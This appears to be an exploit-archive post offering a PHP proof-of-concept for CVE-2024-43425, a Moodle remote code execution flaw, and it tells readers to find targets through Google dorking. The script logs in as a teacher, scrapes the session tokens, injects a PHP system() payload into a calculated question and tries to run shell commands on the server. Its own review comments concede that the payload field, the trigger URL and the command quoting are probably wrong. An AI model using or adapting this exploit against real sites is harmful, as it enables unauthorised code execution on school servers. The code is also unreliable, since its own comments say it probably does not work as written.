Moodle 4.x PHP Code Injection
=============================================================================================================================================
| # Title Moodle 4.x PHP Code Injection
=============================================================================================================================================
| # Title : Moodle 4.x PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://moodle.com/moodle-4/ |
=============================================================================================================================================
POC :
[+] Find targets with Google dorking or another search engine.
[+] Code description: CVE-2024-43425 is a remote code execution issue in Moodle's calculated question type. Note that the script below is authenticated, not pre-auth: it logs in with the configured credentials and needs an account allowed to create questions (a teacher). Its payload is placed in the question text field rather than in the calculated formula the advisory concerns, so check the review notes in the code before relying on it.
[+] Save the code below as poc.php.
[+] Set the target: edit the `$target`, `$username` and `$password` assignments near the top of poc.php.
[+] Usage: php poc.php
[+] Payload:
<?php
//CVE-2024-43425
//https://packetstorm.news/files/id/183003/
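// --- Target configuration (edit these before running) ------------------------
$target = "http://example.com"; // base URL of the Moodle site
$username = "teacher";          // account allowed to create questions; the PoC logs in with it
$password = "password";
// Normalise so the URLs built below never get a double slash.
$target = rtrim($target, '/');

// Cookie jar for the Moodle session. After login it holds the MoodleSession cookie,
// which is as sensitive as the credentials above, so refuse to continue if it cannot
// be created and remove it when the script exits (the original left it in the temp dir).
$cookie_file = tempnam(sys_get_temp_dir(), "cookies");
if ($cookie_file === false) {
    die("Could not create a temporary cookie jar\n");
}
register_shutdown_function(static function () use ($cookie_file) {
    if (is_file($cookie_file)) {
        unlink($cookie_file);
    }
});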
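// cURL wrapper used for every HTTP request in this PoC.
//
// $url          absolute URL to fetch
// $post_fields  when truthy, sent as an application/x-www-form-urlencoded POST body
// $use_cookie   read/write the shared cookie jar ($cookie_file) so the Moodle session persists
// $verify_tls   verify the server certificate; pass false only for lab targets with self-signed certs
//
// Returns the response body (redirects are followed). Exits the script on a transport error.
function send_request($url, $post_fields = null, $use_cookie = true, $verify_tls = true) {
    global $cookie_file;

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        // Bound each request so a hung target does not stall the script forever.
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 30,
        // The original disabled peer verification unconditionally, which hands the
        // teacher credentials and session cookie to any on-path attacker. Verification
        // is now on by default and must be switched off explicitly per call.
        CURLOPT_SSL_VERIFYPEER => (bool) $verify_tls,
        CURLOPT_SSL_VERIFYHOST => $verify_tls ? 2 : 0,
    ]);
    if ($use_cookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    }
    if ($post_fields) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
    }

    $response = curl_exec($ch);
    if ($response === false) {
        // Release the handle before bailing out; the original died with it still open.
        $error = curl_error($ch);
        curl_close($ch);
        die("cURL error: " . $error . "\n");
    }
    curl_close($ch);
    return $response;
}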
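// 1. Fetch the login page to obtain the CSRF `logintoken`.
//    Moodle validates logintoken against the session that issued it, so this request
//    must use the same cookie jar as the login POST that follows. The original fetched
//    the page with cookies disabled, which throws that session away before the login.
$login_page = send_request("$target/login/index.php");
if (!preg_match('/name="logintoken" value="([^"]*)"/', $login_page, $matches)) {
    die("Could not find logintoken on the login page\n");
}
$logintoken = $matches[1];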
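// 2. Log in with the configured credentials (same cookie jar as step 1).
$login_data = [
    "username"   => $username,
    "password"   => $password,
    "logintoken" => $logintoken,
];
$response = send_request("$target/login/index.php", $login_data);

// cURL follows the post-login redirect, so on success $response is the page Moodle
// lands on; on failure it is the login form again, which still carries a logintoken
// field. Check for that explicitly as well as for the "dashboard" marker the original
// relied on alone (a substring heuristic, not a Moodle contract).
if (strpos($response, 'name="logintoken"') !== false || strpos($response, "dashboard") === false) {
    die("Login failed - check the target URL and the credentials\n");
}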
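// 3. Fetch the dashboard and pull the `sesskey` Moodle embeds in its page config;
//    every state-changing form submission below must carry it.
$dashboard = send_request("$target/my/");
if (!preg_match('/"sesskey":"([^"]*)"/', $dashboard, $matches)) {
    die("Could not find sesskey on the dashboard\n");
}
$sesskey = $matches[1];

// 4. Context id used for the question category below.
//    NOTE(review): this takes the first data-contextid attribute on the dashboard, which
//    is not obviously a *course* context - the script never picks a course. Confirm against
//    a real target before relying on it.
if (!preg_match('/data-contextid="(\d+)"/', $dashboard, $matches)) {
    die("Could not find a context id on the dashboard\n");
}
$courseContextId = $matches[1];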
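// 5. Build the question and submit it to the question editor.
//    NOTE(review): the payload goes into questiontext, which Moodle stores and renders as
//    HTML - it is not passed to eval(). The public advisory for CVE-2024-43425 concerns the
//    calculated question type's formula/answer handling, not the question text, so this
//    request as written is not expected to execute anything; verify against the advisory.
//    Also, the payload wraps the whole command in escapeshellarg(), so only a bare program
//    name such as `id` can run - `ls -la` becomes the single token 'ls -la'.
$payload = "<p><?php system(escapeshellarg(\$_GET['a'] ?? 'id')); ?></p>";
$question_data = [
    // Moodle's question form appears to expect "categoryid,contextid" here; the script
    // passes the context id first - check against the target's form markup.
    "category"             => "$courseContextId,1",
    "sesskey"              => $sesskey,
    "qtype"                => "calculated",
    "name"                 => "exploit",
    "questiontext[text]"   => $payload,
    "questiontext[format]" => "1",
    "submitbutton"         => "Save changes",
];
$create_response = send_request("$target/question/question.php", $question_data);

// The original discarded this response. If the editor re-rendered its form (validation
// failure, missing wizard fields, bad category) the question was not saved; say so instead
// of silently moving on. Heuristic: the re-rendered form still contains the text field we
// just posted.
if (strpos($create_response, 'name="questiontext[text]"') !== false) {
    fwrite(STDERR, "Warning: the question form was re-rendered; the question may not have been saved\n");
}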
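// 6. Trigger the injected code and print what comes back.
//    The header says to run this as `php poc.php`; under the CLI $_GET is always empty,
//    so the original could only ever send the default `id`. Take the command from argv
//    first and keep $_GET as a fallback for anyone serving the script through a web server.
//    NOTE(review): question/preview.php is normally addressed by a question id, and the
//    script never captures the id of the question it created - this GET cannot be expected
//    to reach that question. Confirm the real preview URL on the target.
$cmd = $argv[1] ?? $_GET['a'] ?? 'id';
$response = send_request("$target/question/preview.php?a=" . urlencode($cmd));

echo "Response from the target:\n";
// HTML-escaping only matters when the output is rendered by a browser; in a terminal it
// just turns the response into &lt;...&gt; noise.
echo PHP_SAPI === 'cli' ? $response : htmlspecialchars($response, ENT_QUOTES, 'UTF-8');
echo "\n";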
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================